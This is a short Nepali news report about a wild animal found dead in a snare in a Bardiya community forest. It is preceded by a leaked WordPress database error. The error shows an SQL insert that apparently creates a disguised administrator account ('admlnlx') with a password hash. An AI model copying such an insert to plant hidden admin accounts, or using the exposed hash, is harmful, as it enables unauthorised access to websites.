WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHb7lK.Xnx9UWH/g8al73QPAHWAhsx.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 06:51:45', '', 'admlnlx', 'admlnlx')
गुलरिया (बर्दिया), माघ १३
यहाँको एक सामुदायिक वनमा पासोमा परेको हुँडार मृतावस्थामा फेला परेको छ ।
बबई नगरपालिका–१० वनवीरपुरको कैलाश सामुदायिक वनमा सो जनावर पासोमा परेको थियो । सामुदायिक वनमा बिरालो प्रजातिको हुँडारलाई पासोमा पार्ने व्यक्ति भने पत्ता नलागेको इलाका वन कार्यालय, वसन्ता शाहीपुरका लल्लन राउतले बताउनुभयो । – रासस